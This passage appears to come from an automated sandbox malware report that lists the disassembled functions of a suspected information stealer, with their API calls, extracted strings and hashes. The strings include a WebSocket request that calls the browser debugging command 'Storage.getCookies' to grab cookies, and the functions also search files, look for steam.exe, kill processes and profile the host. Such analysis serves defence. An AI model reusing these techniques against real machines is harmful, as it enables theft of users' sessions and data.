                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 50252434-4073750446
                                  • Opcode ID: a588ca6212e4c2cc6668438b45746e6eca985b9680e63258637959bb6b7d30d4
                                  • Instruction ID: a19f91322dc98bc1bfe232fcbb3aa52a7983a9571def4fb54d2adf8605111424
                                  • Opcode Fuzzy Hash: a588ca6212e4c2cc6668438b45746e6eca985b9680e63258637959bb6b7d30d4
                                  • Instruction Fuzzy Hash: 576163B19102199BCB25EF74DC88AEE77B8AF59300F0045A5F549A7391DF34AA98CF90
                                  Function 003248B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                  • API String ID: 909987262-758292691
                                  • Opcode ID: a0a9b49ae8442c0dda119d1da9bfd3ace4c400353f220c00c897a1d16833b16b
                                  • Instruction ID: 68a538497cca5368297a51266ff28d2e92de4a9f848b550527dd55065c5c4776
                                  • Opcode Fuzzy Hash: a0a9b49ae8442c0dda119d1da9bfd3ace4c400353f220c00c897a1d16833b16b
                                  • Instruction Fuzzy Hash: B9A25871E012699FDF25DFA8D8907EDBBB6AF48300F1485A9E508A7281DB705F85CF90
                                  Function 003123A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003123D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003123F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00312402
                                  • lstrlen.KERNEL32(\*.*), ref: 0031240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00312436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00312486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: 0b9f5f1a9d20ada7c489c3df737d1f4428edd7c1ba7d4ad3f69dc33a92222df7
                                  • Instruction ID: 2926e60272190065f2323d9dc21121b1c39fce17e130c489156a164f506a9679
                                  • Opcode Fuzzy Hash: 0b9f5f1a9d20ada7c489c3df737d1f4428edd7c1ba7d4ad3f69dc33a92222df7
                                  • Instruction Fuzzy Hash: 89416E316126198BCB33EF68DD99ADF77B4AF14300F055124F85A9B292CF70DC698B90
                                  Function 003246A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003246B9
                                  • Process32First.KERNEL32(00000000,00000128), ref: 003246C9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 003246DB
                                  • StrCmpCA.SHLWAPI(?,?), ref: 003246ED
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00324702
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00324711
                                  • CloseHandle.KERNEL32(00000000), ref: 00324718
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00324726
                                  • CloseHandle.KERNEL32(00000000), ref: 00324731
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 8bf410cf2f2cc03348b542a5428178b676dfc682cc536a6bdd1015fb44c6cf07
                                  • Instruction ID: 3b8a723f8db869f4b0db898324c10454492e8bed8513201e15bd8b19bb53379b
                                  • Opcode Fuzzy Hash: 8bf410cf2f2cc03348b542a5428178b676dfc682cc536a6bdd1015fb44c6cf07
                                  • Instruction Fuzzy Hash: 5401F9716012246BE7255B64EC8CFFE377CEB55B01F000088F905D2280EFB499589F60
                                  Function 00324610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00324628
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00324638
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0032464A
                                  • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00324660
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00324672
                                  • CloseHandle.KERNEL32(00000000), ref: 0032467D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                  • String ID: steam.exe
                                  • API String ID: 2284531361-2826358650
                                  • Opcode ID: 65a739effa4b2be1f5f3fa7f8d24d7490798ba3ae918787549cd5243c14653a2
                                  • Instruction ID: fa00e17c524b542816960368a187d6bc02f304db0a8153a9e320809c0eb2faeb
                                  • Opcode Fuzzy Hash: 65a739effa4b2be1f5f3fa7f8d24d7490798ba3ae918787549cd5243c14653a2
                                  • Instruction Fuzzy Hash: F50162716012249BE7259B60AC89FEA77BCEF19750F0401D5F908D1240EFB499989BE5
                                  Function 00314B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00314B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00314B7F
                                  • lstrlen.KERNEL32(00334CA8), ref: 00314B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314BA7
                                  • lstrcat.KERNEL32(00000000,00334CA8), ref: 00314BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00314BFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID:
                                  • API String ID: 2567437900-0
                                  • Opcode ID: 932486d7a2026c1b6a6a3f93530c054eaa4315a1fc33dfaa478286ec9c566091
                                  • Instruction ID: c600432f9d67e455f7ff5ed3cedd208813333e2329dafbaccd4e4c3a8003dee8
                                  • Opcode Fuzzy Hash: 932486d7a2026c1b6a6a3f93530c054eaa4315a1fc33dfaa478286ec9c566091
                                  • Instruction Fuzzy Hash: 4331AD316221169BCB27EF68EC99EDF73B9AF54300F014124F8469B291CF70EC298B90
                                  Function 00322D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003271FE
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00322D9B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00322DAD
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00322DBA
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00322DEC
                                  • LocalFree.KERNEL32(00000000), ref: 00322FCA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 62fac38b825cdbab39b9e3e0a22b804e02dc3de45863ab0143186833a88a60f7
                                  • Instruction ID: 5f02fa4932a5ac630e32717dd0b3330e7d7de8ca1bb6adce3002a24af5cc95cb
                                  • Opcode Fuzzy Hash: 62fac38b825cdbab39b9e3e0a22b804e02dc3de45863ab0143186833a88a60f7
                                  • Instruction Fuzzy Hash: E3B1F971900224DFC716CF14E948B96B7F1BB44324F2AC1A9D409AB3A2D7769D86DF90
                                  Function 006C0BE3 Relevance: 10.4, Strings: 7, Instructions: 1699COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !b~$&0?$4An/$E>u$cD~~$fA3/$";f
                                  • API String ID: 0-1556407514
                                  • Opcode ID: 2d0cc503afe11245697e18d2cc95991834ee1d442f384d959bb81200da137a65
                                  • Instruction ID: 6ac3fc0dd16db03704e82d48ee5eb3612b559ca80fa34c64186b83385141f911
                                  • Opcode Fuzzy Hash: 2d0cc503afe11245697e18d2cc95991834ee1d442f384d959bb81200da137a65
                                  • Instruction Fuzzy Hash: 89B238F3A0C2149FE3046E2DEC4567AFBE9EF94720F1A853DE6C4C3744EA3598058696
                                  Function 006B9FC6 Relevance: 10.4, Strings: 7, Instructions: 1693COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :=?$C$~$g*=$uE{[$uaix$v,^$7~s
                                  • API String ID: 0-3688915194
                                  • Opcode ID: e6b72eb26d35bb880bcd7c2a7df1dc827701895c36338a183bb8250ff18f4676
                                  • Instruction ID: 170fe7ee694e54bde621ddc17abe2b98ec1b861c076415609074cc40ca4a63f2
                                  • Opcode Fuzzy Hash: e6b72eb26d35bb880bcd7c2a7df1dc827701895c36338a183bb8250ff18f4676
                                  • Instruction Fuzzy Hash: ECB23AF360C2049FE304AE2DEC8577AB7E9EBD4320F16863DE6C5C3744EA3599058696
                                  Function 006BD624 Relevance: 10.3, Strings: 7, Instructions: 1595COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: X:y$X:y$lI^~$rgC$xVho$|/kw$k
                                  • API String ID: 0-2569428395
                                  • Opcode ID: f8ee84ed3d6c6d79b80db89ae97366bf64b174def9a88397af7f63eb3c99dd6e
                                  • Instruction ID: d7202a08a428a379afd6a1f82ac7140e5644ed37f0640eb930f26302c09112d6
                                  • Opcode Fuzzy Hash: f8ee84ed3d6c6d79b80db89ae97366bf64b174def9a88397af7f63eb3c99dd6e
                                  • Instruction Fuzzy Hash: B4B2F5F3A0C210AFE304AE6DEC8567ABBE9EF94320F16493DE6C4C3744E67558018796
                                  Function 00322C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00322C42
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00322C49
                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00322C58
                                  • wsprintfA.USER32 ref: 00322C83
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
